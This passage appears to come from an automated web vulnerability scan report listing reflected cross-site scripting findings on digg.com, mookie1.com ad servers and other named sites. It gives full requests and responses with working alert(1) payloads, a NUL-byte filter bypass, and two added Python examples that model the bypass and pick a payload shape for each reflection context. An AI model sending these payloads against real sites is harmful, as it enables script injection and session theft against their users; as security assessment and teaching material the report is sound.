Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJU1d4hWhIULOQ4E0Ag==; DMEXP=4; UI="297fc71db05673a122|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; TRG=; RTB=|2939.l.990305

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151
Date: Mon, 07 Mar 2011 01:50:03 GMT

_sdc_loaded=true;
_sdc_error=true;
_sdc_loc_ext_id='f9dbaa88-1937-4ef0-a47d-978a82ed1bde';
_sdc_sz='160x600ac8d0<script>alert(1)</script>93bad1c92ea';

1.114. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks (the href of the RSS <link> element). The payload %00ab6a7"><script>alert(1)</script>c8b7f49b411 was submitted in the REST URL parameter 1. This input was echoed as ab6a7"><script>alert(1)</script>c8b7f49b411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the response is Digg's error page (title error_ - Digg) returned with status 200, so the injection fires even though the requested path does not exist.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked. The echoed attribute shows the NUL re-encoded as %00 while the double quote and angle brackets pass through untouched: the layer doing the blocking and the layer writing the output are not operating on the same view of the input, and that mismatch, not the particular characters on the blocklist, is the defect to fix.

Request

GET /submit%00ab6a7"><script>alert(1)</script>c8b7f49b411 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-774891741542088704%3A191; expires=Wed, 09-Mar-2011 12:02:55 GMT; path=/; domain=digg.com
Set-Cookie: d=9559bdc74bb02ac1edfe251594ddebf2678bcd996a7b3bd18386a04e1bd90e01; expires=Sun, 07-Mar-2021 22:10:35 GMT; path=/; domain=.digg.com
X-Digg-Time: D=225552 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16716

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00ab6a7"><script>alert(1)</script>c8b7f49b411.rss">
...[SNIP]...
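
An added model of the bypass class described in this finding, written for this page and not taken from Digg's code (the function names, the template and the truncation mechanism are assumptions; the report only establishes that %00 before the blocked characters gets past the filter): a blocklist that inspects the input only up to the first NUL byte, next to an output path that echoes the full value. The fixed variant rejects control bytes and encodes for the attribute context, which is the remediation regardless of what the real filter looked like.

```python
import html
from typing import Optional
from urllib.parse import unquote

BLOCKED = ("<", ">", '"', "'")

# Probes modelled on finding 1.114; PROBE_NUL is the report's payload.
PROBE_PLAIN = '/submitab6a7"><script>alert(1)</script>c8b7f49b411'
PROBE_NUL = '/submit%00ab6a7"><script>alert(1)</script>c8b7f49b411'

TEMPLATE = ('<link rel="alternate" type="application/rss+xml" title="Digg" '
            'href="{value}.rss">')


def naive_blocklist_passes(raw_path: str) -> bool:
    """Hypothetical blocklist with C-string semantics: it inspects the decoded
    path only up to the first NUL byte, so anything after %00 is invisible to
    it. One plausible mechanism for the behaviour in the report, not a
    statement about how digg.com was implemented."""
    decoded = unquote(raw_path)
    visible = decoded.split("\x00", 1)[0]
    return not any(ch in visible for ch in BLOCKED)


def render_rss_link_vulnerable(raw_path: str) -> Optional[str]:
    """Vulnerable path: the check runs on the truncated view, the template
    echoes the full value into a double-quoted attribute without encoding.
    The NUL itself is re-encoded as %00, matching the echoed response above,
    while the quote and angle brackets pass through untouched."""
    if not naive_blocklist_passes(raw_path):
        return None  # request rejected by the blocklist
    decoded = unquote(raw_path).replace("\x00", "%00")
    return TEMPLATE.format(value=decoded)


def render_rss_link_fixed(raw_path: str) -> Optional[str]:
    """Remediation: reject control bytes outright, then encode for the exact
    output context (an HTML attribute) instead of trying to blocklist."""
    decoded = unquote(raw_path)
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in decoded):
        return None  # NUL and other control characters never belong in a path
    return TEMPLATE.format(value=html.escape(decoded, quote=True))


if __name__ == "__main__":
    for probe in (PROBE_PLAIN, PROBE_NUL):
        print(repr(probe))
        print("  vulnerable:", render_rss_link_vulnerable(probe))
        print("  fixed     :", render_rss_link_fixed(probe))
```

Run stand-alone, the vulnerable path rejects the plain probe but emits exactly the href seen in the response above for the NUL-prefixed one; the fixed path rejects the NUL-prefixed probe and renders the plain one with &quot; and &lt;script&gt; in place of the raw characters.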

1.115. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1379918009@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b1d"><script>alert(1)</script>f717e003dda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM46b1d"><script>alert(1)</script>f717e003dda/2010DM/1379918009@x23 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM46b1d"><script>alert(1)</script>f717e003dda/2010DM/951692678/x23/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><I
...[SNIP]...

1.116. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1379918009@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5de6"><script>alert(1)</script>3370aaa4e8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe5de6"><script>alert(1)</script>3370aaa4e8c/1379918009@x23 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe5de6"><script>alert(1)</script>3370aaa4e8c/240587422/x23/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><I
...[SNIP]...

1.117. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1379918009@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97f9f"><script>alert(1)</script>40b55b3338d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1379918009@x2397f9f"><script>alert(1)</script>40b55b3338d HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/901202292/x2397f9f"><script>alert(1)</script>40b55b3338d/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><I
...[SNIP]...

1.118. http://dm.de.mookie1.com/2/B3DM/2010DM/1379918009@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1379918009@x23

Issue detail

The entire query string, parameter name and value together, is copied into a JavaScript string which is encapsulated in double quotation marks (the camp variable in the inline script). The payload 3aa96"-alert(1)-"766edfae151 was submitted in the name of an arbitrarily supplied request parameter and was echoed unmodified, so the script reads var camp="3aa96"-alert(1)-"766edfae151=1";.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The "-alert(1)-" shape closes the string, evaluates the call as one operand of a subtraction, and reopens a string, so the statement stays syntactically valid and the rest of the script continues to run. Because the reflection point is the raw query string rather than a named parameter, no particular parameter name is needed to reach it.

Request

GET /2/B3DM/2010DM/1379918009@x23?3aa96"-alert(1)-"766edfae151=1 HTTP/1.1
Host: dm.de.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2406
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="3aa96"-alert(1)-"766edfae151=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...
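
An added classifier, written for this page and not Burp's own code nor code from any site named here, that reproduces the triage behind the Issue detail wording in findings 1.113 to 1.118: find where the scanner's marker landed, decide whether that is plain text, a quoted attribute or a quoted JavaScript string, and pick the probe shape the report used for that context. The sample bodies are trimmed, constructed copies of the responses above.

```python
import re
from typing import Optional

# Constructed, trimmed response fragments modelled on findings 1.113 to 1.118.
# Each is (body, marker); the marker is the random prefix Burp puts in front of
# its probe, and the classifier works from where that marker lands.
SAMPLES = {
    # 1.113 fimserve: a JavaScript fragment served as text/html with no tags
    "fimserve_sz": (
        "_sdc_loaded=true;\n_sdc_error=true;\n"
        "_sdc_sz='160x600ac8d0<script>alert(1)</script>93bad1c92ea';\n",
        "ac8d0",
    ),
    # 1.114 digg: double-quoted href attribute
    "digg_rest1": (
        '<link rel="alternate" type="application/rss+xml" title="Digg" '
        'href="/submit%00ab6a7"><script>alert(1)</script>c8b7f49b411.rss">',
        "ab6a7",
    ),
    # 1.115 mookie: double-quoted HREF attribute
    "mookie_rest2": (
        '<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/'
        'B3DM46b1d"><script>alert(1)</script>f717e003dda/x23?x" target="_top">',
        "46b1d",
    ),
    # 1.118 mookie: double-quoted JavaScript string inside an inline <script>
    "mookie_param": (
        "<html><head></head><body>\n<script>\n"
        'function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); '
        'if(s==-1)return ""; var e=ife.indexOf(";",s); return ife.substring(s,e); }\n'
        'var camp="3aa96"-alert(1)-"766edfae151=1";\n</script>',
        "3aa96",
    ),
}

# Probe shape the report used for each context it encountered.
PROBES = {
    "text": "<script>alert(1)</script>",
    "attr_dq": '"><script>alert(1)</script>',
    "attr_sq": "'><script>alert(1)</script>",
    "js_string_dq": '"-alert(1)-"',
    "js_string_sq": "'-alert(1)-'",
}


def _odd(count: int) -> bool:
    return count % 2 == 1


def reflection_context(body: str, marker: str) -> str:
    """Classify the syntactic context of the first reflection of marker.

    Returns text, tag, attr_dq, attr_sq, js_code, js_string_dq, js_string_sq
    or not_reflected. The heuristic looks only at the text before the marker,
    which is enough for the single-reflection cases in this report.
    """
    pos = body.find(marker)
    if pos < 0:
        return "not_reflected"
    before = body[:pos]

    # Inside an inline <script> block?  Compare the last open and close tags.
    opens = [m.end() for m in re.finditer(r"<script\b[^>]*>", before, re.I)]
    closes = [m.end() for m in re.finditer(r"</script\s*>", before, re.I)]
    if opens and (not closes or opens[-1] > closes[-1]):
        js = before[opens[-1]:]
        if _odd(len(re.findall(r'(?<!\\)"', js))):
            return "js_string_dq"
        if _odd(len(re.findall(r"(?<!\\)'", js))):
            return "js_string_sq"
        return "js_code"

    # Inside a tag?  A '<' after the last '>' means the tag is still open.
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:
        tag = before[lt:]
        if _odd(tag.count('"')):
            return "attr_dq"
        if _odd(tag.count("'")):
            return "attr_sq"
        return "tag"
    return "text"


def probe_for(context: str) -> Optional[str]:
    """Probe the report used for a context, or None for contexts it does not
    cover (bare JavaScript code, an unquoted attribute)."""
    return PROBES.get(context)


if __name__ == "__main__":
    for name, (body, marker) in SAMPLES.items():
        ctx = reflection_context(body, marker)
        print(f"{name:14s} {ctx:14s} probe: {probe_for(ctx)}")
```

Context decides the payload: the bare <script> probe that works in fimserve's tag-free text/html body would be inert inside mookie's double-quoted camp string, where the "-alert(1)-" shape keeps the statement valid instead. The classifier is a heuristic over the prefix of the body and says nothing about output encoding; whether a " or < actually survives is what separates the report's "Certain" findings from its "Firm" ones and still has to be confirmed against the real response.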

1.119. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a8e"><script>alert(1)</script>030155edc73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM98a8e"><script>alert(1)</script>030155edc73/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM98a8e"><script>alert(1)</script>030155edc73/2010DM/25748040/x23/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><IM
...[SNIP]...

1.120. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cb7"><script>alert(1)</script>053f18afa9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM94cb7"><script>alert(1)</script>053f18afa9e/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM94cb7"><script>alert(1)</script>053f18afa9e/188151413/x23/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><I
...[SNIP]...

1.121. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c158b"><script>alert(1)</script>159ab450cc2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/141706813@x23c158b"><script>alert(1)</script>159ab450cc2?USNetwork/Dell_Streak11Q1_Max_Demo_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:37:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1967531099/x23c158b"><script>alert(1)</script>159ab450cc2/default/empty.gif/726348573830316230526341444e4645?x" target="_top"><
...[SNIP]...

1.122. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [USNetwork/Dell_Streak11Q1_Max_Demo_160 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The value of the USNetwork/Dell_Streak11Q1_Max_Demo_160 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ded7"-alert(1)-"8d231d38687 was submitted in the USNetwork/Dell_Streak11Q1_Max_Demo_160 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_1602ded7"-alert(1)-"8d231d38687 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2442
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dell_Streak11Q1_Max_Demo_1602ded7"-alert(1)-"8d231d38687";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

1.123. http://dm.de.mookie1.com/2/B3DM/2010DM/141706813@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/141706813@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f536"-alert(1)-"0101be03ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/141706813@x23?USNetwork/Dell_Streak11Q1_Max_Demo_160&7f536"-alert(1)-"0101be03ded=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; other_20110126=set; dlx_XXX=set; id=3375925924; session=1299459588|1299459588

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:36:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2445
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dell_Streak11Q1_Max_Demo_160&7f536"-alert(1)-"0101be03ded=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

1.124. http://domainnamesales.com/lcontact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://domainnamesales.com
Path:   /lcontact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83be0"><script>alert(1)</script>c558e1b4c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83be0\"><script>alert(1)</script>c558e1b4c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lcontact/?83be0"><script>alert(1)</script>c558e1b4c87=1 HTTP/1.1
Host: domainnamesales.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 12:02:53 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.2
